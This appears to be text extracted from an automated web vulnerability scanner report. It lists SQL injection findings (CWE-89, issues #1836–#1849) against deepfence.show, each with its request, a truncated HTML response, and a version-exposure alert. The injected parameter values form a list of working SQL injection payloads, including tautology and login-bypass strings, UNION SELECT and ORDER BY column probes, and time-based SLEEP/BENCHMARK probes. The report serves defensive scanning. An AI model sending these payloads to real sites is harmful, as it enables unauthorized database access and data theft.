<!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1836\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1837\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1838\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1839\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1840\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1841\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1842\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1843\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1844\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1845\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*…*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1846\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or ((\"x\"))=((\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1847\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1848\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1849\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' UNION SELECT sum(columnname ) from \ntablename --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 